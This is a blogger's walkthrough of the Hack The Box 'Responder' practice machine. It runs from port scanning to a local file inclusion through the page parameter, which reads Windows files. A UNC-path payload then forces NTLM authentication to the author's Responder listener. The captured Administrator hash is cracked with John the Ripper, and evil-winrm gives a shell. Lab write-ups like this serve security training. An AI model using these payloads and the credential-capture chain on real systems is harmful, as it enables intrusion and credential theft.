nopedawn

HTB | Responder - Starting Point

Created: Mar 2, 2026
Last edited: Mar 12, 2026

https://app.hackthebox.com/machines/Responder/



Responder | Walkthrough

Phase
Reconnaissance
Foothold

Reconnaissance

Using nmap to enumerate all open ports in the target

nmap -sV -sC -p- -T4 10.129.28.209
port scanning
nopedawn@npdn ~/L/H/S/Responder> nmap -sV -sC -p- -T4 10.129.28.209
Starting Nmap 7.80 ( https://nmap.org ) at 2026-03-02 11:49 WIB
Host is up (0.70s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
5985/tcp open  http       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7680/tcp open  tcpwrapped
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 401.32 seconds

After scanning, there are some interesting tcp service opens

  • Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) in port 80
  • Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) in port 5985
  • tcpwrapped in port 7680

It seems like we’re about to dealing windows pentest.

If we visit web service 10.129.28.209 we’re being redirected to unika.htb domain.

curl web service
nopedawn@npdn ~/L/H/S/Responder> curl -v 10.129.28.209
*   Trying 10.129.28.209:80...
* Connected to 10.129.28.209 (10.129.28.209) port 80 (#0)
> GET / HTTP/1.1
> Host: 10.129.28.209
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 05:10:07 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 61
< Content-Type: text/html; charset=UTF-8
<
* Connection #0 to host 10.129.28.209 left intact
<meta http-equiv="refresh" content="0;url=http://unika.htb/">

After some research, we have to add unika.htb into hosts file located in /etc/hosts.

nopedawn@npdn ~/L/H/S/Responder> echo "10.129.28.209 unika.htb" | sudo tee -a /etc/hosts
[sudo] password for nopedawn:
10.129.28.209 unika.htb

And we can access it via unika.htb domain, then we can ping it

pinging host
nopedawn@npdn ~/L/H/S/Responder> ping unika.htb
PING unika.htb (10.129.28.209) 56(84) bytes of data.
64 bytes from unika.htb (10.129.28.209): icmp_seq=1 ttl=126 time=361 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=2 ttl=126 time=2180 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=3 ttl=126 time=1170 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=4 ttl=126 time=374 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=5 ttl=126 time=228 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=6 ttl=126 time=1699 ms
64 bytes from unika.htb (10.129.28.209): icmp_seq=7 ttl=126 time=931 ms
^C
--- unika.htb ping statistics ---
8 packets transmitted, 7 received, 12.5% packet loss, time 7623ms
rtt min/avg/max/mdev = 227.915/991.873/2180.246/687.770 ms, pipe 3

I do enumerating service and got /index.php is accessible.

ⓘ gobuster scan version

I use Gobuster 2 version Gobuster v2.0.1 in here, which may be old/deprecated. So, if you’re using Gobuster 3 or latest version. Use this following command:

gobuster dir -u 10.129.28.209 -w /usr/share/wordlists/SecLists/Web-Content/common.txt

Just adding dir argument.

enumerating host
nopedawn@npdn ~/L/H/S/Responder> gobuster -u 10.129.28.209 -w /usr/share/wordlists/SecLists/Web-Content/common.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.129.28.209/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/SecLists/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout      : 10s
=====================================================
2026/03/02 12:25:55 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/aux (Status: 403)
/cgi-bin/ (Status: 403)
/com1 (Status: 403)
/com2 (Status: 403)
/com4 (Status: 403)
/com3 (Status: 403)
/con (Status: 403)
/css (Status: 301)
/img (Status: 301)
/inc (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/licenses (Status: 403)
/lpt2 (Status: 403)
/lpt1 (Status: 403)
/nul (Status: 403)
/phpmyadmin (Status: 403)
/prn (Status: 403)
/server-status (Status: 403)
/server-info (Status: 403)
/webalizer (Status: 403)
=====================================================
2026/03/02 12:30:42 Finished
=====================================================

Foothold

I notice that if we’re changing language option menu in navbar, it will come up url parameter like this

http://unika.htb/index.php?page=french.html

And if we modify it ?page=french.html to ?../

The response will be error.

curl error
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=../
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=../ HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 06:23:18 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 307
< Content-Type: text/html; charset=UTF-8
<
<br />
<b>Warning</b>:  include(C:\xampp): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '../' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
* Connection #0 to host unika.htb left intact

Seems like exploitable.

After doing some exploration, I come up with nuclei tool made by projectdiscovery to fuzz & scanning all stuff and it’s the best practice to doing some blackbox pentest exploration and automation.

nuclei fuzz
nopedawn@npdn ~/L/H/S/Responder> nuclei -u unika.htb

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.7.0

                projectdiscovery.io

[INF] Current nuclei version: v3.7.0 (latest)
[INF] Current nuclei-templates version: v10.3.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 9814
[INF] Executing 9812 signed templates from projectdiscovery/nuclei-templates
[WRN] Loading 2 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Templates clustered: 2240 (Reduced 2115 Requests)
[INF] Using Interactsh Server: oast.site
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 29, error found in #10 byte of ...|rotocol":"dnsi�Ĉ,|..., bigger context ...|{"protocol":"dnsi�Ĉ,p��m�)
             �y��.��/��yf�IP
                            J��Es�)��;�b��|...
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 30, error found in #10 byte of ...|rotocol":"dnstK�Ew�|..., bigger context ...|{"protocol":"dnstK�Ew҇�8Q�DՐ�p��޺��
                       Eg�]"6~j�����.��|...
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 16, error found in #10 byte of ...|rotocol":"dns�pf�$�|..., bigger context ...|{"protocol":"dns�pf�$��K�Z�T��]k[�␦�qp��՝!�(�~~����WKp9|...
[http-trace:trace-request] [http] [info] http://unika.htb
[waf-detect:apachegeneric] [http] [info] http://unika.htb
[generic-windows-lfi] [http] [high] http://unika.htb/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini [paths="/?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini"]
[missing-sri] [http] [info] http://unika.htb/ ["http://fonts.googleapis.com/css?family=Roboto:400,700,500","http://fonts.googleapis.com/css?family=Lato:300,400"]
[form-detection] [http] [info] http://unika.htb
[apache-detect] [http] [info] http://unika.htb ["Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1"]
[openssl-detect] [http] [info] http://unika.htb ["OpenSSL/1.1.1m"]
[php-detect] [http] [info] http://unika.htb ["8.1.1"]
[old-copyright] [http] [info] http://unika.htb ["&copy; 2022 -"]
[http-missing-security-headers:referrer-policy] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-embedder-policy] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-opener-policy] [http] [info] http://unika.htb
[http-missing-security-headers:strict-transport-security] [http] [info] http://unika.htb
[http-missing-security-headers:content-security-policy] [http] [info] http://unika.htb
[http-missing-security-headers:permissions-policy] [http] [info] http://unika.htb
[http-missing-security-headers:x-frame-options] [http] [info] http://unika.htb
[http-missing-security-headers:clear-site-data] [http] [info] http://unika.htb
[http-missing-security-headers:cross-origin-resource-policy] [http] [info] http://unika.htb
[http-missing-security-headers:x-content-type-options] [http] [info] http://unika.htb
[http-missing-security-headers:x-permitted-cross-domain-policies] [http] [info] http://unika.htb
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 22, error found in #10 byte of ...|rotocol":"dnsp�r���|..., bigger context ...|{"protocol":"dnsp�r����C0��UU ۨ��,X��!EX!��&�xGJ<`�Q�gʋ�␦�|...
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 12, error found in #10 byte of ...|rotocol":"dns��xݗ�8|..., bigger context ...|{"protocol":"dns��xݗ�8��
]�s7w\�k�Q!����{e�\|[�k� ��j��d�|...
[ERR] Could not unmarshal interaction data interaction: server.Interaction.Protocol: ReadString: invalid control character found: 21, error found in #10 byte of ...|rotocol":"dns�+/��'|..., bigger context ...|{"protocol"�p���9�[��%�Y����I|...���
[tech-detect:bootstrap] [http] [info] http://unika.htb
[tech-detect:google-font-api] [http] [info] http://unika.htb
[tech-detect:php] [http] [info] http://unika.htb
[tech-detect:owl-carousel] [http] [info] http://unika.htb
[tech-detect:font-awesome] [http] [info] http://unika.htb
[tech-detect:animate.css] [http] [info] http://unika.htb
[cgi-printenv] [http] [medium] http://unika.htb/cgi-bin/printenv.pl
[caa-fingerprint] [dns] [info] unika.htb
[INF] Scan completed in 9m. 28 matches found.

Notice the ?page=..%2f..%2f..%2f..%2f..%2fwindows/win.ini parameter is accessible and its not sanitize for user input, this will lead to Local File Inclusion (LFI) Vulnerability.

curl win.ini
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/?page=../../../../../windows/win.ini
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /?page=../../../../../windows/win.ini HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 06:50:21 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 92
< Content-Type: text/html; charset=UTF-8
<
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
* Connection #0 to host unika.htb left intact

WIN.INI is an initialization file employed in early versions of Microsoft Windows, starting from Windows 1.0 (1985), particularly Windows 3.x, to store user-configurable settings that define the operating environment, including desktop customization, input device behaviors, file associations, international formats, and multimedia configurations. (see more)

Another file was found which was windows hosts file, and it’s accessible.

?page=../../../../../../../../windows/system32/drivers/etc/hosts

curl hosts
nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 07:04:26 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 824
< Content-Type: text/html; charset=UTF-8
<
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
* Connection #0 to host unika.htb left intact

Findings:

  • /?page=../../../../../windows/win.ini
  • ?page=../../../../../../../../windows/system32/drivers/etc/hosts

These two findings are tagged as [high] severity.

If a web application is vulnerable to file inclusion, an attacker can supply a file path that references an SMB share hosted on their own server, allowing interaction over the SMB protocol. (see more)

Base on previous port-scanning we can enumerating smb service, we can use Responder tool to do it.

Run the Responder tool with python3, using the -I option to specify the interface you want to monitor. In this example, the interface I’m using is tun0.

ifconfig
nopedawn@npdn ~/L/H/S/Responder> ifconfig
tun0: flags=4305<UP,POINTOPOINT,RUNNING,NOARP,MULTICAST>  mtu 1500
        inet 10.10.17.49  netmask █████████████  destination █████████████
        inet6 ██████████████████  prefixlen 64  scopeid 0x0<global>
        inet6 ████████████████████████  prefixlen 64  scopeid 0x20<link>
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 500  (UNSPEC)
        RX packets 57  bytes 51227 (51.2 KB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 179  bytes 11072 (11.0 KB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Note: The IP address used here corresponds to the tun0 interface.

And then run it

responder
nopedawn@npdn ~/L/H/S/Responder> sudo Responder/Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


[*] Tips jar:
    USDT -> 0xCc98c1D3b8cd9b717b5257827102940e4E17A19A
    BTC  -> bc1q9360jedhhmps5vpl3u05vyg4jryrl52dmazz49

[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]
    DHCPv6                     [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    MQTT server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]
    SNMP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.17.49]
    Responder IPv6             [fe80::666a:f562:e69:4402]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']
    Don't Respond To MDNS TLD  ['_DOSVC']
    TTL for poisoned response  [default]

[+] Current Session Variables:
    Responder Machine Name     [WIN-7TUOJH6NVKN]
    Responder Domain Name      [ROKF.LOCAL]
    Responder DCE-RPC Port     [46606]

[*] Version: Responder 3.2.2.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>

[+] Listening for events...

[!] Error starting SSL server on port 5986, check permissions or other servers running.
[!] Error starting SSL server on port 443, check permissions or other servers running.
[!] Error starting SSL server on port 636, check permissions or other servers running.

After sending the payload (somefile), we’ll get an error like this.

nopedawn@npdn ~/L/H/S/Responder> curl -v http://unika.htb/index.php?page=//10.10.17.49/somefile
*   Trying 10.129.28.209:80...
* Connected to unika.htb (10.129.28.209) port 80 (#0)
> GET /index.php?page=//10.10.17.49/somefile HTTP/1.1
> Host: unika.htb
> User-Agent: curl/7.81.0
> Accept: */*
> 
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Date: Mon, 02 Mar 2026 08:32:16 GMT
< Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
< X-Powered-By: PHP/8.1.1
< Content-Length: 340
< Content-Type: text/html; charset=UTF-8
< 
<br />
<b>Warning</b>:  include(\\10.10.17.49\SOMEFILE): Failed to open stream: Permission denied in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
<br />
<b>Warning</b>:  include(): Failed opening '//10.10.17.49/somefile' for inclusion (include_path='\xampp\php\PEAR') in <b>C:\xampp\htdocs\index.php</b> on line <b>11</b><br />
* Connection #0 to host unika.htb left intact

Back to Responder, we’ve successfully captured the hash.

hash captured
nopedawn@npdn ~/L/H/S/Responder> sudo Responder/Responder.py -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|
...
[SMB] NTLMv2-SSP Client   : 10.129.28.209
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash     : Administrator::RESPONDER:3fb4916f3eb93a90:E257A5E859EF176146D73BE48E6FCE06:01010000000000008074458E59AADC01E4410496392EFC2C000000000200080052004F004B00460001001E00570049004E002D003700540055004F004A00480036004E0056004B004E0004003400570049004E002D003700540055004F004A00480036004E0056004B004E002E0052004F004B0046002E004C004F00430041004C000300140052004F004B0046002E004C004F00430041004C000500140052004F004B0046002E004C004F00430041004C00070008008074458E59AADC0106000400020000000800300030000000000000000100000000200000EFBD94854B15CF7BE0674A9A425500CEC250D7280712F3223E6E5FA806AC14F20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00340039000000000000000000

Next, we’ll use John the Ripper to crack it and retrieve the Administrator password.

Save that hash, in this case I saved as somefile.hash

somefile.hash
nopedawn@npdn ~/L/H/S/Responder> echo "Administrator::RESPONDER:3fb4916f3eb93a90:E257A5E859EF176146D73BE48E6FCE06:01010000000000008074458E59AADC01E4410496392EFC2C000000000200080052004F004B00460001001E00570049004E002D003700540055004F004A00480036004E0056004B004E0004003400570049004E002D003700540055004F004A00480036004E0056004B004E002E0052004F004B0046002E004C004F00430041004C000300140052004F004B0046002E004C004F00430041004C000500140052004F004B0046002E004C004F00430041004C00070008008074458E59AADC0106000400020000000800300030000000000000000100000000200000EFBD94854B15CF7BE0674A9A425500CEC250D7280712F3223E6E5FA806AC14F20A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310037002E00340039000000000000000000" > somefile.hash

Crack it using JTR with the following command, and got the password is badminton

john somefile.hash --wordlist=/usr/share/wordlists/rock
jtr somefile.hash crack
nopedawn@npdn ~/L/H/S/Responder> john somefile.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
badminton        (Administrator)
1g 0:00:00:00 DONE (2026-03-02 15:41) 33.33g/s 341333p/s 341333c/s 341333C/s 123456..11221122
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.

So the final credential we got is administrator:badminton. For now let’s move on to evil-winrm to remote access it

evil-winrm remote
nopedawn@npdn ~/L/H/S/Responder> evil-winrm -i 10.129.28.209 -u administrator -p badminton

Evil-WinRM shell v3.9

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

And voila!! we got the cmd-shell

The flag is stored in C:\Users\mike\Desktop\flag.txt

cmd-shell
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls
*Evil-WinRM* PS C:\Users\Administrator\Documents> type flag.txt
Cannot find path 'C:\Users\Administrator\Documents\flag.txt' because it does not exist.
At line:1 char:1
+ type flag.txt
+ ~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\Admini...uments\flag.txt:String) [Get-Content], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetContentCommand
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\..\
*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          3/9/2022   5:35 PM                Administrator
d-----          3/9/2022   5:33 PM                mike
d-r---        10/10/2020  12:37 PM                Public


*Evil-WinRM* PS C:\Users> cd mike
*Evil-WinRM* PS C:\Users\mike> dir


    Directory: C:\Users\mike


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----         3/10/2022   4:51 AM                Desktop


*Evil-WinRM* PS C:\Users\mike> cd Desktop
*Evil-WinRM* PS C:\Users\mike\Desktop> dir


    Directory: C:\Users\mike\Desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         3/10/2022   4:50 AM             32 flag.txt


*Evil-WinRM* PS C:\Users\mike\Desktop> type flag.txt
REDACTED
*Evil-WinRM* PS C:\Users\mike\Desktop>

Source:

https://docs.projectdiscovery.io/templates/introduction
https://grokipedia.com/page/winini
https://www.sentinelone.com/cybersecurity-101/identity-security/windows-ntlm/
https://github.com/openwall/john
https://github.com/Hackplayers/evil-winrm

Prev
HTB | Three - Starting Point
Next
HTB | Crocodile - Starting Point